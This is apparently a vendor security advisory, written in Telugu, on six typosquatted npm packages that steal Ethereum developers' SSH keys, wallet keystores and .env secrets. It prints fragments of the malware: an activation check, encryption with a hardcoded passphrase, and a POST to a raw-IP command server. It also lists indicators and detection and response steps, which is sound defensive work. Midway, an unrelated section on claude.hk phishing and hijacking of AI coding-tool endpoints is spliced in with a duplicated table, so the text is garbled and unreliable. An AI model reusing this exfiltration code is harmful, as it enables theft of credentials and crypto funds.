EVMDeFi npm టైపోస్క్వాటింగ్ దాడి డెవలపర్ కీలను దొంగిలిస్తుంది

EVM/DeFi npm టైపోస్క్వాటింగ్ దాడి డెవలపర్ కీలను దొంగిలిస్తుంది

విషయ సూచిక

తప్పక చదవాల్సిన పోస్ట్‌లు

ఆసక్తికరమైన తాజా పోస్ట్‌లు

TL; DR

మే 6, 2026న, ఒకే ఒక్క npm పబ్లిషర్, namikazesarada010206Ethereum, Solidity, మరియు DeFi డెవలపర్ ఎకోసిస్టమ్‌ను లక్ష్యంగా చేసుకుని ఆరు హానికరమైన ప్యాకేజీలను చొప్పించారు.

ప్యాకేజీలు, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsమరియు web3-utils-core, జనాదరణ పొందిన Web3 టూలింగ్ కోసం సహాయక లైబ్రరీల వలె కనిపించేలా రూపొందించిన నమ్మశక్యమైన పేర్లను ఉపయోగించారు.

ఆరు ప్యాకేజీలలోనూ ఒకే రకమైనవి ఉన్నాయి telemetry.js ఫైల్. ఆ ఫైల్ క్లస్టర్ అంతటా SHA-256తో బైట్ పరంగా ఒకేలా ఉంది:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

మాల్వేర్ ఇన్‌స్టాల్ సమయంలో అమలు కాదు. అక్కడ ఏమీ లేదు preinstall or postinstall హుక్. దానికి బదులుగా, ప్యాకేజీని ఇంపోర్ట్ చేసినప్పుడు ఇది యాక్టివేట్ అవుతుంది require().

ఆ వివరానికి ప్రాముఖ్యత ఉంది.

ఒక డెవలపర్ ప్యాకేజీని వాస్తవంగా ఉపయోగించే వరకు ఇంప్లాంట్ వేచి ఉంటుంది. ఆ తర్వాత, వర్క్‌స్టేషన్ నిజమైన Ethereum / Solidity డెవలప్‌మెంట్ ఎన్విరాన్‌మెంట్ లాగా ఉందో లేదో అది తనిఖీ చేస్తుంది. అది Alchemy లేదా Infura కీలు, ప్రైవేట్ కీలు, నిమోనిక్స్, డిప్లాయర్ కీలు, లేదా స్థానిక Foundry డైరెక్టరీ కోసం వెతుకుతుంది.

హోస్ట్ సరిపోలితే, స్టీలర్ SSH ప్రైవేట్ కీలు, ఫౌండ్రీ / గెత్ / బ్రౌనీ వాలెట్ కీస్టోర్‌లను సేకరిస్తుంది, .env* ఫైళ్లు మరియు సున్నితమైన ఎన్విరాన్‌మెంట్ వేరియబుల్స్. ఇది హార్డ్‌కోడెడ్ పాస్‌ఫ్రేజ్‌ను ఉపయోగించి AES-256-GCMతో బండిల్‌ను ఎన్‌క్రిప్ట్ చేస్తుంది మరియు TLS వెరిఫికేషన్ డిసేబుల్ చేయబడిన రా IPv4 C2 ఎండ్‌పాయింట్‌కు దానిని బయటకు పంపుతుంది.

Xygeni యొక్క మాల్వేర్ ఎర్లీ వార్నింగ్ (MEW) సిస్టమ్ ఆరు ప్యాకేజీలన్నింటినీ హానికరమైనవిగా నిర్ధారించింది. npm రిజిస్ట్రీ టేక్‌డౌన్ రిపోర్ట్ బండిల్ పెండింగ్‌లో ఉంది.

ది క్లస్టర్: ఆరు ప్యాకేజీలు, ఒక ప్రచురణకర్త

ప్రచురణకర్త ఖాతా namikazesarada010206 ధృవీకరించని Gmail చిరునామాకు లింక్ చేయబడింది namikazesarada010206@gmail.com.

ఈ ప్రచారం మే 6, 2026న ఒకే రోజు ప్రచురణగా వెలువడింది. ఆరు ప్యాకేజీలన్నీ ఈ విధంగా వెర్షన్ చేయబడ్డాయి. 1.0.0, ఎటువంటి రన్‌టైమ్ డిపెండెన్సీలను కలిగి లేదు మరియు కేవలం మూడు ఫైళ్లను మాత్రమే పంపింది:

package.json index.js telemetry.js

వారు కూడా అదే సోర్స్ రిపోజిటరీని ప్రకటించారు:

https://github.com/harunosakura030303-maker/evmchain-config

మొదటి ప్రచురణలోనే మొదటి మూడు ప్యాకేజీలు MEW స్కానర్ల ద్వారా పట్టుబడ్డాయి. ప్రచురణకర్త యొక్క npm ప్రొఫైల్‌ను విశ్లేషకులు సమీక్షించిన తర్వాత మిగిలిన మూడు బలవంతంగా ఫ్లాగ్ చేయబడ్డాయి. ఒకే బైట్-ఐడెంటికల్ telemetry.js క్లస్టర్ అంతటా నిర్ధారించబడినప్పటికీ, స్థిరత్వం ఆధారంగా వాటిని హానికరమైనవిగా మూసివేశారు.

ప్యాకేజీ వెర్షన్ npm ప్రచురించింది MEW టికెట్ తీర్పు
వియమ్-కోర్ 1.0.0 2026-05-06 01:38:44Z #51049 హానికరమైన
viem-utils-core 1.0.0 2026-05-06 #51050 హానికరమైన
హార్డ్‌హాట్-కోర్-యుటిల్స్ 1.0.0 2026-05-06 #51051 హానికరమైన
evm-utils 1.0.0 2026-05-06 #51069 దురుద్దేశపూరితమైన, స్థిరత్వం ద్వారా
ఫౌండ్రీ-యుటిల్స్ 1.0.0 2026-05-06 #51071 దురుద్దేశపూరితమైన, స్థిరత్వం ద్వారా
వెబ్3-యుటిల్స్-కోర్ 1.0.0 2026-05-06 #51070 దురుద్దేశపూరితమైన, స్థిరత్వం ద్వారా

పేరు పెట్టే వ్యూహం సూటిగా ఉన్నా ప్రభావవంతంగా ఉంది.

ఈ ప్యాకేజీలు ఖచ్చితమైన అప్‌స్ట్రీమ్ పేర్లను అనుకరించవు. బదులుగా, అవి ఈ క్రింది విధంగా నమ్మశక్యమైన “యుటిలిటీ” సఫిక్స్‌లను ఉపయోగిస్తాయి. -core, -utilsమరియు -utils-coreఅందువల్ల అవి, ఒక డెవలపర్ వెబ్3 టూలింగ్ దగ్గర చూడాలని ఆశించే అనుబంధ లైబ్రరీల వలె కనిపిస్తాయి.

హానికరమైన ప్యాకేజీ చట్టబద్ధమైన లక్ష్యం
వియమ్-కోర్ viem, ఒక ప్రసిద్ధ Ethereum TypeScript క్లయింట్
viem-utils-core వియెమ్
హార్డ్‌హాట్-కోర్-యుటిల్స్ హార్డ్‌హాట్, ఒక ప్రధాన స్రవంతి సాలిడిటీ డెవలప్‌మెంట్ ఎన్విరాన్‌మెంట్
evm-utils జెనరిక్ EVM టూలింగ్ నేమ్‌స్పేస్
ఫౌండ్రీ-యుటిల్స్ ఫౌండ్రీ, ఒక సాలిడిటీ టూల్‌చెయిన్
వెబ్3-యుటిల్స్-కోర్ వెబ్3-యుటిల్స్, వెబ్3.js సహాయకాలు

ఇది “అనుబంధ ప్యాకేజీ” నమూనా: “నేనే అసలైన ప్యాకేజీని” అని కాదు, కానీ “నేను అసలైన ప్యాకేజీ చుట్టూ ఒక సహేతుకమైన సహాయకుడిలా కనిపిస్తాను.”

వేగంగా అభివృద్ధి చెందుతున్న డీఫై డెవలపర్‌లకు, ప్రమాదాన్ని సృష్టించడానికి అది చాలు.

ప్యాకేజీని దిగుమతి చేసినప్పుడు ఏమి జరుగుతుంది

ఈ దాడి గొలుసు చిన్నది, ఉద్దేశపూర్వకమైనది మరియు క్రిప్టో-డెవలప్‌మెంట్ పరిసరాలపై కేంద్రీకృతమై ఉంది.

ఇన్‌స్టాలేషన్ హుక్ లేదు. దానికి బదులుగా, ప్రతి ప్యాకేజీలో ఒక index.js అది స్టబ్ ఫంక్షనాలిటీని ఎగుమతి చేసి, ఆపై హానికరమైన టెలిమెట్రీ మాడ్యూల్‌ను లోడ్ చేస్తుంది.

require('./telemetry').init();

దీని అర్థం మాల్వేర్ మొదటిసారి ఇంపోర్ట్ చేసినప్పుడే యాక్టివేట్ అవుతుంది.

అది దాడి చేసేవారికి కార్యాచరణపరంగా ఉపయోగపడుతుంది. చాలా స్కానర్లు మరియు శాండ్‌బాక్స్‌లు ఇన్‌స్టాల్-సమయ ప్రవర్తనపై దృష్టి పెడతాయి. ఈ ప్యాకేజీ ఒక డెవలపర్, బిల్డ్ స్క్రిప్ట్, టెస్ట్ సూట్ లేదా రన్‌టైమ్ పాత్ ద్వారా వాస్తవంగా ఉపయోగించబడే వరకు వేచి ఉంటుంది.

యాక్టివేషన్ గేట్: నిజమైన వెబ్3 డెవలపర్ వర్క్‌స్టేషన్‌లలో మాత్రమే పనిచేస్తుంది

ఇంప్లాంట్‌లో అత్యంత ముఖ్యమైన భాగం యాక్టివేషన్ గేట్.

ఈ మాల్వేర్, Ethereum / Solidity డెవలపర్ మెషీన్‌లలో సాధారణంగా కనిపించే ఎన్విరాన్‌మెంట్ వేరియబుల్స్‌ను తనిఖీ చేస్తుంది:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

ఇది ఫౌండ్రీ ఇన్‌స్టాల్ చేయబడి ఉందో లేదో కూడా తనిఖీ చేస్తుంది:

fs.existsSync(path.join(os.homedir(), '.foundry'))

రెండు షరతులలో ఏదీ నిజం కాకపోతే, ఫంక్షన్ ఏమీ చేయకుండా తిరిగి వస్తుంది.

అది సాధారణ విశ్లేషణ వాతావరణాలలో ప్యాకేజీని నిశ్శబ్దంగా ఉంచుతుంది. ఫౌండ్రీ, ఆల్కెమీ కీలు, ఇన్ఫ్యూరా కీలు, ప్రైవేట్ కీలు లేదా నిమోనిక్స్ లేని శాండ్‌బాక్స్, హానిచేయనిదిగా కనిపించే ఇంపోర్ట్‌ను గుర్తించవచ్చు.

సరిపోలిన హోస్ట్‌లో, మాల్వేర్ సేకరణకు ముందు 60 నుండి 90 సెకన్ల వరకు వేచి ఉంటుంది:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

ఈ ఆలస్యం దిగుమతి మరియు తరలింపు మధ్య ఉన్న స్పష్టమైన సంబంధాన్ని తగ్గిస్తుంది. .unref() ప్యాకేజీని స్వల్పకాలిక స్క్రిప్ట్‌లో ఇంపోర్ట్ చేసినట్లయితే, ఈ కాల్ హోస్ట్ ప్రాసెస్ సాధారణంగా నిష్క్రమించడానికి కూడా అనుమతిస్తుంది.

ఇది శబ్దం చేస్తూ చేసే అడ్డదిడ్డమైన దొంగతనం కాదు. డెవలపర్ ఎన్విరాన్‌మెంట్ దొంగిలించడానికి యోగ్యమైనది అయితే తప్ప పనిచేయకుండా ఉండేలా రూపొందించబడిన ఒక లక్షిత దొంగతనం ఇది.

దొంగ ఏమి సేకరిస్తాడు

యాక్టివేషన్ గేట్ దాటిన తర్వాత, మాల్వేర్ వెబ్3 డెవలప్‌మెంట్‌లో అత్యంత ముఖ్యమైన మూలాల నుండి సమాచారాన్ని సేకరిస్తుంది: ప్రైవేట్ కీలు, వాలెట్ కీస్టోర్‌లు, డిప్లాయ్‌మెంట్ క్రెడెన్షియల్స్, క్లౌడ్ సీక్రెట్స్, npm టోకెన్‌లు మరియు స్థానిక ప్రాజెక్ట్ కాన్ఫిగరేషన్.

మూల ఏమి సేకరించబడింది
process.env /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i కి సరిపోలే ఏదైనా వేరియబుల్
~/.ssh/* PRIVATE KEY లేదా BEGIN OPENSSH ఉన్న ఫైల్‌లు, పూర్తి ఫైల్ కంటెంట్‌తో సహా
~/.foundry/keystores/* ఫౌండ్రీ వాలెట్ కీస్టోర్ ఫైల్స్
~/.ethereum/keystore/* గెత్ వాలెట్ కీస్టోర్ ఫైల్స్
~/.బ్రౌనీ/అకౌంట్స్/* బ్రౌనీ వాలెట్ కీస్టోర్ ఫైల్స్
${cwd}/.env పూర్తి ఫైల్ కంటెంట్
${cwd}/.env.local పూర్తి ఫైల్ కంటెంట్
${cwd}/.env.production పూర్తి ఫైల్ కంటెంట్
${cwd}/.env.development పూర్తి ఫైల్ కంటెంట్
os.hostname() హోస్ట్ మెటాడేటా
crypto.randomUUID() బాధితుడు/సెషన్ గుర్తింపుదారుడు
Date.now() సేకరణ టైమ్‌స్టాంప్
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA టోకెన్లు ఇవి:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

ఆ టెలిమెట్రీ ఆపరేటర్ యొక్క సొంత విశ్లేషణలా లేక విడిగా డబ్బు సంపాదించే ఛానెలా అనేది మేము నిర్ధారించలేకపోయాము. మేము పరిశీలించిన రెండు నమూనాలలోనూ ATTA టోకెన్లు ఒకే విధంగా ఉన్నాయి.

క్లస్టర్ బి: హెయిబాయి

claude.hk OAuth ఫిషింగ్ + ANTHROPIC_BASE_URL హైజాక్

ఏప్రిల్ 1 నమూనా అనేది ఈ ప్రచారంలో తొలిదశకు చెందిన ముడి నమూనా.

heibai:2.1.88-claude.hk-4 ప్రచురించింది wuguoqiangvip28జూన్ 7, 2025న సృష్టించబడిన ఖాతా. ఈ ప్యాకేజీ చట్టబద్ధమైన దానితో పోల్చి స్పష్టంగా వెర్షన్ చేయబడింది. 2.1.88 మానవ ప్రేరిత విడుదల.

ఇది CA-సర్టిఫికెట్ MITM గురించి పట్టించుకోదు. దానికి బదులుగా, ఇది OAuth ఎండ్‌పాయింట్ గురించి వినియోగదారునికి అబద్ధం చెబుతుంది.

లీక్ అయిన క్లాడ్ కోడ్ సోర్స్‌కు జోడించిన హానికరమైన అంశాలు ఇవి:

మూల ఏమి సేకరించబడింది
process.env /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i కి సరిపోలే ఏదైనా వేరియబుల్
~/.ssh/* PRIVATE KEY లేదా BEGIN OPENSSH ఉన్న ఫైల్‌లు, పూర్తి ఫైల్ కంటెంట్‌తో సహా
~/.foundry/keystores/* ఫౌండ్రీ వాలెట్ కీస్టోర్ ఫైల్స్
~/.ethereum/keystore/* గెత్ వాలెట్ కీస్టోర్ ఫైల్స్
~/.బ్రౌనీ/అకౌంట్స్/* బ్రౌనీ వాలెట్ కీస్టోర్ ఫైల్స్
${cwd}/.env పూర్తి ఫైల్ కంటెంట్
${cwd}/.env.local పూర్తి ఫైల్ కంటెంట్
${cwd}/.env.production పూర్తి ఫైల్ కంటెంట్
${cwd}/.env.development పూర్తి ఫైల్ కంటెంట్
os.hostname() హోస్ట్ మెటాడేటా
crypto.randomUUID() బాధితుడు/సెషన్ గుర్తింపుదారుడు
Date.now() సేకరణ టైమ్‌స్టాంప్

లక్ష్యాల జాబితా చాలా నిర్దిష్టమైనది. ఇది సాధారణ బ్రౌజర్ దొంగతనం లేదా విస్తృత క్రెడెన్షియల్ స్క్రాపింగ్ కాదు. ఇది Ethereum అప్లికేషన్‌లను నిర్మించే, పరీక్షించే, అమలుచేసే లేదా నిర్వహించే డెవలపర్‌లను లక్ష్యంగా చేసుకుంది.

ఫౌండ్రీ, గెత్ మరియు బ్రౌనీ కీస్టోర్‌లను చేర్చడం చాలా ముఖ్యం. ఈ ఫైళ్లు వాలెట్‌లకు లేదా డిప్లాయ్‌మెంట్ ఐడెంటిటీలకు ప్రత్యక్ష ప్రాప్యతను సూచించగలవు. దాడి చేసేవారు వీటిని పాస్‌వర్డ్‌లు, నిమోనిక్స్ లేదా ఎన్విరాన్‌మెంట్ సీక్రెట్‌లతో జత చేయగలిగితే, వారు నిధులను తరలించడం, డిప్లాయర్ల వలె నటించడం లేదా స్మార్ట్ కాంట్రాక్ట్ కార్యకలాపాలను దెబ్బతీయడం వంటివి చేయగలరు.

బహిర్గతం చేయడానికి ముందు ఎన్క్రిప్షన్

మాల్వేర్ సేకరించిన డేటాను బయటకు పంపే ముందు ఎన్‌క్రిప్ట్ చేస్తుంది.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

హార్డ్‌కోడ్ చేయబడిన పాస్‌ఫ్రేజ్:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

తుది పేలోడ్ JSON రూపంలో ఉంటుంది:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

ఎన్‌క్రిప్షన్ చేయడం వల్ల మాల్‌వేర్ దానంతట అదే మరింత అధునాతనంగా మారదు. అయితే, అది నెట్‌వర్క్ తనిఖీని కష్టతరం చేస్తుంది. ఎగ్రెస్‌ను గమనిస్తున్న డిఫెండర్ ఒక JSON పేలోడ్‌ను చూడగలడు, కానీ దొంగిలించబడిన కీలు, వాలెట్ ఫైళ్లు లేదా ఇతర సమాచారాన్ని చూడలేడు. .env హార్డ్‌కోడ్ చేయబడిన పాస్‌ఫ్రేజ్ మరియు డీక్రిప్షన్ లాజిక్ లేని కంటెంట్‌లు.

రా IPv4 C2 కి ఎక్స్ఫిల్ట్రేషన్

బహిష్కరణ మార్గం హార్డ్‌కోడ్ చేయబడింది:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

మాల్వేర్ వీరికి డేటాను పంపుతుంది:

https://76.13.37.80:8443/api/v1/telemetry

రెండు వివరాలు ప్రత్యేకంగా కనిపిస్తాయి.

మొదటగా, C2 అనేది ఒక డొమైన్ కాకుండా ఒక రా IPv4 చిరునామా. దానివల్ల డొమైన్ రిజిస్ట్రేషన్ అవసరం ఉండదు మరియు కొన్ని డొమైన్ ఆధారిత గుర్తింపులను నివారించవచ్చు.

రెండవది, TLS ధృవీకరణ దీనితో నిలిపివేయబడింది:

rejectUnauthorized: false

అది మాల్వేర్‌ను సెల్ఫ్-సైన్డ్ సర్టిఫికేట్‌లతో సహా ఏ సర్టిఫికేట్‌నైనా అంగీకరించేలా చేస్తుంది. మరో మాటలో చెప్పాలంటే, దాడి చేసేవాడు చెల్లుబాటు అయ్యే పబ్లిక్ సర్టిఫికేట్ అవసరం లేకుండానే ఎన్‌క్రిప్టెడ్ ట్రాన్స్‌పోర్ట్‌ను పొందుతాడు.

తిరిగి ప్రయత్నించే లాజిక్ గానీ, ఫాల్‌బ్యాక్ హోస్ట్ గానీ లేదు. లోపాలు నిశ్శబ్దంగా కప్పివేయబడతాయి. దీనివల్ల, C2 ఆఫ్‌లైన్‌లో ఉన్నా లేదా అందుబాటులో లేకపోయినా ప్యాకేజీ నిశ్శబ్దంగా ఉంటుంది.

ఈ ప్రచారం ఎందుకు ముఖ్యమైనది

డెవలపర్‌లను లక్ష్యంగా చేసుకున్న చాలా హానికరమైన npm ప్యాకేజీలు npm టోకెన్‌లు, AWS కీలు, GitHub టోకెన్‌లు లేదా వంటి విస్తృతమైన ఆధారాలను పొందడానికి ప్రయత్నిస్తాయి. .npmrc ఫైళ్లు.

ఈ ప్రచారం లక్ష్యాన్ని పరిమితం చేస్తుంది.

ఇది ఆ మెషిన్ ఒక Ethereum లేదా Solidity డెవలపర్‌కు చెందినదని సూచించే సంకేతాల కోసం చూస్తుంది. ఆ తర్వాత అది ఆ ఎన్విరాన్‌మెంట్‌లో ముఖ్యమైన అసెట్స్‌ను మాత్రమే తీసుకుంటుంది: వాలెట్ కీస్టోర్‌లు, ప్రైవేట్ కీలు, నిమోనిక్స్, డిప్లాయర్ కీలు. .env ఫైళ్లు, మరియు SSH కీలు.

అది ఆ క్యాంపెయిన్‌ను ఒక సాధారణ npm స్టీలర్ కంటే Web3 టీమ్‌లకు మరింత ప్రమాదకరంగా చేస్తుంది.

విజయవంతమైన సంక్రమణ ఈ క్రింది వాటిని బహిర్గతం చేయగలదు:

  • విస్తరణ వాలెట్లు
  • స్మార్ట్ కాంట్రాక్ట్ అడ్మిన్ కీలు
  • RPC ప్రొవైడర్ కీలు
  • క్లౌడ్ విస్తరణ ఆధారాలు
  • npm పబ్లిషింగ్ టోకెన్లు
  • డెవలపర్ లేదా బిల్డ్ ఇన్‌ఫ్రాస్ట్రక్చర్‌కు SSH యాక్సెస్
  • ప్రాజెక్ట్ రహస్యాలు నిల్వ చేయబడ్డాయి .env ఫైళ్లు
  • ఫౌండ్రీ, గెత్, లేదా బ్రౌనీ కోసం వాలెట్ కీస్టోర్‌లు

ప్యాకేజీ పేర్లు కూడా స్పష్టమైన సోషల్ ఇంజనీరింగ్‌ను చూపిస్తున్నాయి. వారు సుపరిచితమైన టూల్ పేర్ల ద్వారా వెబ్3 డెవలపర్ ఎకోసిస్టమ్‌ను లక్ష్యంగా చేసుకుంటున్నారు: viem, hardhat, foundry, evmమరియు web3.

నటుడు అసలు ప్రాజెక్టుల విషయంలో రాజీ పడాల్సిన అవసరం లేదు. వారికి కావలసిందల్లా, సహేతుకంగా కనిపించే ఒక అనుబంధ ప్యాకేజీని ఇన్‌స్టాల్ చేయడానికి ఒక డెవలపర్ మాత్రమే.

రాజీ మరియు గుర్తింపు సూచికలు

ప్యాకేజీలు మరియు ప్రచురణకర్త
ఫీల్డ్ విలువ
npm ప్రచురణకర్త నమికాజెసరదా010206
ప్రచురణకర్త ఇమెయిల్ namikazesarada010206@gmail.com
ఇమెయిల్ ధృవీకరించబడింది తోబుట్టువుల
SCM తనిఖీ తోబుట్టువుల
కీర్తి స్కోరు 1.0
ప్యాకేజీలు viem-core, viem-utils-core, hardhat-core-utils, evm-utils, Foundry-utils, web3-utils-core
సంస్కరణలు అన్ని 1.0.0
మూల రిపోజిటరీ https://github.com/harunosakura030303-maker/evmchain-config
హానికరమైనదిగా నిర్ధారించబడింది మొత్తం ఆరు ప్యాకేజీలు
నెట్వర్క్
రకం విలువ
C2 ఎండ్‌పాయింట్ https://76.13.37.80:8443/api/v1/telemetry
సి2 ఐపి 76.13.37.80
C2 పోర్ట్ 8443/tcp
TLS ప్రవర్తన అనధికారిక తిరస్కరణ: తప్పు
పేలోడ్ స్కీమా {"v":2,"iv": "డి": ,"t": }
ఫైల్స్ మరియు హాష్‌లు
రకం విలువ
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
ప్యాకేజీ లేఅవుట్ package.json, index.js, telemetry.js
ఫైల్ గణన 3
సుమారు మొత్తం పరిమాణం 3.4 KB

యాక్టివేషన్ సిగ్నల్స్

మాల్వేర్ ఈ ఎన్విరాన్మెంట్ వేరియబుల్స్‌ను తనిఖీ చేస్తుంది:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

ఇది వీటిని కూడా తనిఖీ చేస్తుంది:

~/.foundry/

లక్షిత హోస్ట్ మార్గాలు

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

సేకరణ రెగెక్స్

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

గుర్తింపు గమనికలు

పూర్తి ప్రవర్తనా విశ్లేషణ అవసరం లేకుండానే అనేక నియమాలు ఈ ప్రచారాన్ని పట్టుకుంటాయి.

మొదట, ఆరు హానికరమైన ప్యాకేజీ పేర్ల కోసం లాక్‌ఫైల్‌లను స్కాన్ చేయండి:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

ఏదైనా మ్యాచ్‌లో package-lock.json, yarn.lock, pnpm-lock.yamlలేదా node_modules గతాన్ని ఒక తీవ్రమైన సంఘటనగా పరిగణించాలి.

రెండవది, వాలెట్ కీస్టోర్ మార్గాలను చదివే Node.js ప్రాసెస్‌లను పర్యవేక్షించండి:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

సహాయక డిపెండెన్సీగా ఇంపోర్ట్ చేయబడిన ప్యాకేజీకి ఇది అరుదుగా చట్టబద్ధమైన ప్రవర్తన. దీని తర్వాత బయటి నెట్‌వర్క్ కార్యకలాపాలు జరిగినప్పుడు ఇది మరింత అనుమానాస్పదంగా ఉంటుంది.

మూడవదిగా, ఈ క్రింది వాటికి HTTPS కనెక్షన్‌లను నిరోధించండి లేదా హెచ్చరించండి:

76.13.37.80:8443

ముఖ్యంగా అభ్యర్థన మార్గం ఇలా ఉన్నప్పుడు:

/api/v1/telemetry

నాలుగవది, ఈ లక్షణాలను కలిపి ఉన్న npm ప్యాకేజీల కోసం వెతకండి:

  • కొత్త లేదా తక్కువ ఖ్యాతి ఉన్న ప్రచురణకర్త
  • ధృవీకరించని Gmail ఖాతా
  • వెబ్3-సంబంధిత ప్యాకేజీ పేరు
  • అర్థవంతమైన రిపోజిటరీ చరిత్ర లేదు
  • చిన్న ప్యాకేజీ లేఅవుట్
  • index.js అది టెలిమెట్రీ లేదా సహాయక ఫైల్‌ను లోడ్ చేస్తుంది
  • రన్‌టైమ్ డిపెండెన్సీలు లేవు
  • సున్నితమైన పర్యావరణ-చరరాశి సేకరణ
  • వాలెట్ కీస్టోర్ యాక్సెస్

ఒకే IOC కంటే ఈ నమూనా మరింత ఉపయోగకరమైనది, ఎందుకంటే తదుపరి ప్యాకేజీ IP చిరునామాను మార్చవచ్చు కానీ అదే టార్గెటింగ్ లాజిక్‌ను కొనసాగిస్తుంది.

రాజీ ప్రతిస్పందన చెక్‌లిస్ట్

ఒకవేళ డెవలపర్ ఆరు ప్యాకేజీలలో ఒకదాన్ని ఉపయోగించి, వారి ఎన్విరాన్‌మెంట్ యాక్టివేషన్ గేట్‌తో సరిపోలితే, ఆ వర్క్‌స్టేషన్‌ను రాజీపడినట్లుగా పరిగణించండి.

అందులో ఫౌండ్రీ ఇన్‌స్టాల్ చేయబడిన మెషీన్‌లు, ఎన్విరాన్‌మెంట్‌లో ఆల్కెమీ లేదా ఇన్‌ఫ్యూరా కీలు, ప్రైవేట్ కీలు, నిమోనిక్స్ లేదా డిప్లాయర్ కీలు ఉంటాయి.

సిఫార్సు చేయబడిన ప్రతిస్పందన:

  • హోస్ట్‌ను నెట్‌వర్క్ నుండి డిస్‌కనెక్ట్ చేయండి.
  • ప్రిజర్వ్ node_modules, లాక్‌ఫైల్స్, షెల్ హిస్టరీ, మరియు ఫోరెన్సిక్స్ కోసం సంబంధిత లాగ్‌లు.
  • ప్రతి SSH కీజతను కింద తిప్పండి ~/.ssh/.
  • ప్రతి కీస్టోర్ కింద వాలెట్ కీలను తిప్పండి ~/.foundry, ~/.ethereumమరియు ~/.brownie.
  • నిధులను కొత్త వాలెట్లకు తరలించండి.
  • నిల్వ చేయబడిన ప్రతి రహస్యాన్ని తిప్పండి .env* డెవలపర్ పనిచేసిన రిపోజిటరీలలోని ఫైల్స్.
  • కలెక్షన్ రెగెక్స్‌కు సరిపోలే ఎన్విరాన్‌మెంట్ సీక్రెట్‌లను రొటేట్ చేయండి, వీటిలో AWS కీలు, npm టోకెన్‌లు, డిప్లాయ్ టోకెన్‌లు, API కీలు, ప్రైవేట్ కీలు, సీడ్‌లు మరియు నిమోనిక్‌లు ఉంటాయి.
  • ప్యాకేజీని మొదటిసారి ఇన్‌స్టాల్ చేసినప్పటి నుండి క్లౌడ్, npm, GitHub, RPC ప్రొవైడర్ మరియు బ్లాక్‌చెయిన్ కార్యకలాపాలను ఆడిట్ చేయండి.
  • తిరిగి ఉపయోగించే ముందు వర్క్‌స్టేషన్‌ను రీ-ఇమేజ్ చేయండి.

రక్షక క్రీడాకారులు ఏమి గ్రహించాలి

అధిక విలువ కలిగిన డెవలపర్ ఎకోసిస్టమ్‌ల చుట్టూ npm టైపోస్క్వాటింగ్ ఎలా పరిణామం చెందుతోందో ఈ ప్రచారం చూపిస్తుంది.

ఆ యాక్టర్‌కు నిలకడ అవసరం లేదు. వారికి అస్పష్టత అవసరం లేదు. వారికి ఇన్‌స్టాల్-టైమ్ ఎగ్జిక్యూషన్ కూడా అవసరం లేదు.

దానికి బదులుగా, వారు మూడు విషయాలపై ఆధారపడ్డారు:

  • ఆమోదయోగ్యమైన వెబ్3 ప్యాకేజీ పేర్లు
  • నిజమైన క్రిప్టో-డెవలప్‌మెంట్ మెషీన్‌లలో మాత్రమే యాక్టివేషన్
  • Ethereum డెవలపర్‌లకు అత్యంత ముఖ్యమైన ఫైళ్లు మరియు రహస్యాలను నేరుగా దొంగిలించడం

అందువల్ల, విస్తృత పరిశీలనలో ఈ ప్రచారాన్ని గుర్తించడం సులభం కాదు మరియు సరైన వాతావరణంలోకి ప్రవేశించినప్పుడు ఇది ప్రమాదకరంగా మారుతుంది.

Web3 బృందాలకు గుణపాఠం స్పష్టంగా ఉంది: డిపెండెన్సీ పేర్లను మీ ముప్పు నమూనాలో భాగంగా పరిగణించండి. హానిచేయని సహాయక ప్యాకేజీలా కనిపించేది కూడా, మీ వాలెట్‌కు నష్టం కలిగించడానికి అతి తక్కువ మార్గంగా మారగలదు.

npm రిజిస్ట్రీకి నివేదించబడింది. పబ్లిషర్ ఖాతా మరియు ప్యాకేజీలు తొలగించబడినప్పుడు మేము ఈ పోస్ట్‌ను అప్‌డేట్ చేస్తాము.

sca-tools-software-composition-analysis-tools
మీ సాఫ్ట్‌వేర్ ప్రమాదాలకు ప్రాధాన్యత ఇవ్వండి, వాటిని పరిష్కరించండి మరియు సురక్షితం చేయండి.
మీ ఉచిత ఖాతాను పొందండి.
క్రెడిట్ కార్డ్ అవసరం లేదు.

మీ సాఫ్ట్‌వేర్ అభివృద్ధి మరియు డెలివరీని సురక్షితం చేసుకోండి

Xygeni ఉత్పత్తి శ్రేణితో